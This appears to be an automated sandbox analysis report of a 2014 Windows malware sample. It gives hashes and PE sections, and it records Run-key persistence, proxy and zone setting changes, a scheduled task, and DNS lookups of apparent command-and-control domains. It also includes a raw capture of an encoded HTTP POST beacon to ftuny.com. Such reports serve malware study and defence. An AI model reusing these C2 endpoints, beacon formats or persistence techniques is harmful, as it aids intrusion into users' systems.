Analysis Date2014-08-22 11:09:03
MD58d2076cbd7adda395f7c96fa86072849
SHA10b2f2fdecf665e05e1114e20efae93ebdbc12eeb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 76016e0296694eb649b402f60ecb5c42 sha1: 251d3c601152232750b375c78c76982418d729f4 size: 14848
SectionDATA md5: 4f72eccf9eae06b6d6febb840b39512b sha1: 2f183df720f6b87929ae46c3b1c65bd4e1fe9c02 size: 154624
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 3827bd350e8b7ac1e17dca963574ec34 sha1: ee3b3a3b27391765670c519e1eb77144d49c50be size: 3072
Section.reloc md5: f4ad603ee7786113a6a94f321e453fc1 sha1: f28ac84b25d1607d1e1614f6dda1dcc95c791094 size: 1024
Section.rsrc md5: fcd0a701513266715f9bad81786fd98d sha1: c09d11c940c3cca596fe259712ea3c165641ecb2 size: 1024
Timestamp1992-06-19 22:22:17
PEhash4b0869cd06f8a3ccaa279934c20eb8b27fd47f76
IMPhashc026b969030c0f9a87fb6d5cce0ff1c3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Q7NZMT7RLB ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Q7NZMT7RLB\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNStopkio.com
Winsock DNSftuny.com

Network Details:

DNSwp.pl
Type: A
212.77.100.101
DNSspankwire.com
Type: A
94.199.252.72
DNS51.la
Type: A
117.21.226.199
DNSftuny.com
Type: A
208.73.211.175
DNSftuny.com
Type: A
208.73.211.174
DNSftuny.com
Type: A
208.73.211.163
DNSftuny.com
Type: A
208.73.211.242
DNSftuny.com
Type: A
208.73.211.193
DNStopkio.com
Type: A
DNSphreeway.com
Type: A
DNStirefondn.com
Type: A
HTTP POSThttp://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 208.73.211.175:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   7055336b 4f487037 65526348 5069596f   pU3kOHp7eRcHPiYo
0x00000150 (00336)   3939494d 55756a67 55573462 76544964   99IMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c6e 726e6c49   /Golwxlm9kLnrnlI
0x00000230 (00560)   2b356736 6e333664 2f33346b 6f465630   +5g6n36d/34koFV0
0x00000240 (00576)   61365169 2f673d3d                     a6Qi/g==


Strings
K}.".."'......
...
y@0P
i.
-.
..4.O..
.
L.E...
@_:J.
..f.2..s.......A..
..
k.tw.K
.)8.
,M.

#/|&
{09S
	1k!
1t(U/
&%(3
3oyt
!4v{
5~?[
'59M
@6aup
)8aB
8 j}
8S-}
!8vnB
9 [PQ^
AIt(
a}j]
ap%f1
}cKT
%ECa
F`>[
[Fd:
GF\6
gQ1w
HH<u
ir@{
K[<1'
|Kc}
km#e
m#hm
p?Oo
Qm'd
rR&;
\"SL
\So"
;t7T
t8a~u]6
tbQ!}
TgDL
!tIb3
tTm@V
^tTu4
:tXs
ue"m
(V`{
vbc%r
v&CU
wBc<s
wCq~$
w?_o
w,<S
x8%9T(
X?Vz
y:FD	
Zh:"
z!HGZ
0/AjG1}
12d9a3ea
2"2*222:2B2J2R2Z2b2j2r2z2
3%3+31373=3C3I3O3U3[3a3g3m3s3y3
3&3.363>3F3N3V3^3f3n3v3~3
4!4'4-43494?4E4K4Q4W4]4c4i4o4u4{4
4&4.464>4F4N4V4^4f4n4v4~4
7Sj%#L
8:<ja8?
9&9-949<9C9X9,:3:{<
9F<P<q=
>a%081
AppCompat_RunDLLW
  </application> 
  <application> 
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B1+!h=w
B4:u(y
@BJ;m,w	
CallNamedPipeA
ChildWindowFromPoint
ChooseFontA
CoCreateFreeThreadedMarshaler
CoGetTreatAsClass
CoInitialize
comdlg32.dll
CommDlgExtendedError
CommitSpoolData
CompareFileTime
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CopyFileExA
CopyFileExW
CoQueryReleaseObject
CreateHardLinkW
CreateWindowExA
DefFrameProcW
DeletePrintProvidorW
DestroyCaret
DEVICECAPABILITIES
DevQueryPrintEx
DllGetVersion
DragQueryFileW
EqualRect
EXTDEVICEMODE
FlushConsoleInputBuffer
freeaddrinfo
fv<+ED
GetClassWord
GetEnvironmentVariableA
GetFileTitleW
GetHGlobalFromILockBytes
GetOpenFileNameA
GetOpenFileNameW
GetProcAddress
GetSaveFileNameW
GetSystemDefaultLCID
GetWindowTextA
GetWindowThreadProcessId
ICJI9-
.idata
InflateRect
InternalExtractIconListW
IntersectRect
IsValidInterface
kernel32.dll
KKGJ;E
LoadLibraryA
LoadLibraryExA
LocalAlloc
LocalFree
'{m+,,,
M0W0`0f0l0
(}nGF?
OffsetRect
ole32.dll
OleCreateLinkFromData
OleDuplicateData
OleIsCurrentClipboard
OpenAs_RunDLL
Options_RunDLLA
O=ZQ1j
PageSetupDlgW
PathAddBackslashA
PathCanonicalizeW
PathCompactPathExA
PathFindFileNameW
PathFindOnPathW
PathIsSameRootA
pb?[*6
PrintDlgExA
PrintDlgW
P.rsrc
PtInRect
p;t;x;
RealShellExecuteW
regapi
.reloc
ReplaceTextW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
      </security>
      <security>
SetLocaleInfoW
SetPortA
SetWindowTextA
SHBrowseForFolder
SHBrowseForFolderW
SHChangeNotifySuspendResume
SHCreateLocalServerRunDll
shell32.dll
SHFreeNameMappings
SHGetSpecialFolderPathA
SHGetThreadRef
SHInvokePrinterCommandW
shlwapi.dll
SHOpenRegStreamA
SHPathPrepareForWriteA
SHRegGetPathW
SHRegQueryInfoUSKeyW
SHStrDupA
StrCatBuffA
StrCmpNW
StrCpyW
StringX
StrRChrIA
StrRStrIA
StrStrNW
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
?(?S?Z?o?
)=t,,,
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
UnionRect
UrlApplySchemeA
UrlCreateFromPathA
user32.dll
VirtualAllocEx
VirtualFree
VirtualProtect
vpVe/j
WantArrows
WindowFromPoint
winspool.drv
WriteFileEx
ws2_32.dll
WSAAddressToStringW
WSAEnumProtocolsW
WSAInstallServiceClassA
WSAJoinLeaf
WSANtohs
WSASendDisconnect
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
ZsPiH\